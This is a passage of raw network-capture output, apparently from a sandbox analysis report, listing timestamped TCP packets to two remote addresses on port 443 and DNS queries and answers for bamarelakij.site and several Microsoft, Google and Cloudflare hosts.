                                                                                                                                                                  Jan 6, 2025 23:18:21.147875071 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.148003101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.148176908 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.162719965 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.185329914 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.281136990 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.282988071 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.288872004 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.288880110 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.288887978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.288897038 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.289407969 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.298405886 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.394052029 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.400469065 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.400516033 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.400566101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.400815964 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.412821054 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.508064032 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.515417099 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.515425920 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.515507936 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.515858889 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.544759989 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.582843065 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.634329081 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.678143978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683434010 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683581114 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683589935 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683878899 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.691816092 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.787333965 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793068886 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793080091 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793090105 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793306112 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.800259113 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.896508932 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902965069 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902973890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902986050 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.903265953 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.903332949 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.903376102 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.911776066 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.007189989 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012667894 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012677908 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012686014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012916088 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.030771971 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.127844095 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134222984 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134233952 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134248972 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134475946 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.149557114 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.247071981 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255486012 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255496025 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255503893 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255733013 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.270915985 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.366396904 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.372853041 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.372961998 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.373044014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.373256922 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.381282091 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.517554998 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526539087 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526549101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526591063 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526804924 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.533493042 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.653868914 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.654500961 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663712978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663929939 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663938999 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663958073 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.675481081 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.774216890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789051056 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789196014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789205074 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789338112 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.797277927 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.907007933 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.937433958 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.957937956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958082914 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958091974 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958271027 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.965641022 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.060966015 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070040941 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070050955 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070086956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070384979 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.078085899 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.177692890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.204185009 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.234819889 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.234838009 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.234875917 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.242523909 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.253464937 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.348944902 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357220888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357232094 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357240915 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.358103037 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.367569923 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.483808041 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504544973 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504564047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504573107 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504929066 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.535763025 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.599493027 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.622569084 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.695523977 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701411009 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701421022 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701431036 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.781493902 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.807012081 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.819453955 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.858270884 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.858573914 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.899682999 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.922851086 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.923911095 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.929924011 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.930041075 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.930052042 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.935467958 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.935544014 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.935578108 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.964251995 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.060533047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067028046 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067051888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067060947 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067420959 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.125591993 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.183496952 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.186959028 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.278774023 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.283804893 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.283935070 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.283982038 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.290549040 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.315718889 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.331734896 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.413311005 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.446332932 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.454248905 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.454631090 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.454642057 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.454884052 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.454938889 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.454976082 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.469320059 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.565057993 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.570105076 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.570249081 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.570297003 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.570338964 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.579763889 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.675158024 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.681853056 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.681866884 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.681874037 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.682320118 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.693088055 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.788360119 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.795595884 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.795608997 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.795617104 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.795907021 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.804809093 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.900091887 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.908353090 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.908363104 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.908370972 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.908622026 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.916577101 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.013411999 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.021972895 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.026844978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.026854992 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.035460949 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.053251982 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.149360895 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.156021118 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.156030893 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.156039000 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.158900023 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.162642956 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.262456894 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.275516987 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.275528908 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.275553942 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.275832891 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.275913954 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.275914907 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.282078981 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.384347916 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.416235924 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.423578024 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.423590899 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.423599005 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.423815966 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.429256916 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.524544001 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.530838013 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.530848980 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.530863047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.530885935 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.534683943 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.558940887 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:25.655601025 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:58.829782009 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:58.830118895 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:58.830838919 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:58.831070900 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:58.831581116 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:58.831840992 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.280433893 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.280980110 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.320972919 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.375246048 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.375298023 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.375447035 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.375457048 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.385637045 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.385870934 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.479598045 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.495599985 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.606149912 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.606288910 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.606301069 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.606350899 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.606359959 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:59.606559038 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:59.607017994 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:19:00.177331924 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:19:00.177331924 CET51584443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:19:00.274287939 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:19:00.274301052 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:19:00.274324894 CET44351584172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:19:00.275080919 CET51584443192.168.2.4172.64.41.3

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 6, 2025 23:17:48.213066101 CET192.168.2.41.1.1.10x3518Standard query (0)bamarelakij.siteA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:56.719775915 CET192.168.2.41.1.1.10x9738Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:56.720226049 CET192.168.2.41.1.1.10x984fStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:58.823640108 CET192.168.2.41.1.1.10x48dbStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:58.824219942 CET192.168.2.41.1.1.10xfbaeStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.056394100 CET192.168.2.41.1.1.10x3d0bStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.056565046 CET192.168.2.41.1.1.10x81f6Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.481759071 CET192.168.2.41.1.1.10x535bStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.482114077 CET192.168.2.41.1.1.10xf577Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.490888119 CET192.168.2.41.1.1.10x5186Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.491116047 CET192.168.2.41.1.1.10x5244Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.497993946 CET192.168.2.41.1.1.10x3acdStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.498202085 CET192.168.2.41.1.1.10x2769Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.503046989 CET192.168.2.41.1.1.10x56aeStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.503248930 CET192.168.2.41.1.1.10x99d1Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.608118057 CET192.168.2.41.1.1.10x2f77Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.608577967 CET192.168.2.41.1.1.10x5888Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.609925032 CET192.168.2.41.1.1.10xea62Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.610390902 CET192.168.2.41.1.1.10xd03Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.707710981 CET192.168.2.41.1.1.10xbfStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.707952976 CET192.168.2.41.1.1.10x6389Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Jan 6, 2025 23:17:48.224993944 CET1.1.1.1192.168.2.40x3518No error (0)bamarelakij.site104.21.80.52A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:48.224993944 CET1.1.1.1192.168.2.40x3518No error (0)bamarelakij.site172.67.174.91A (IP address)IN (0x0001)false
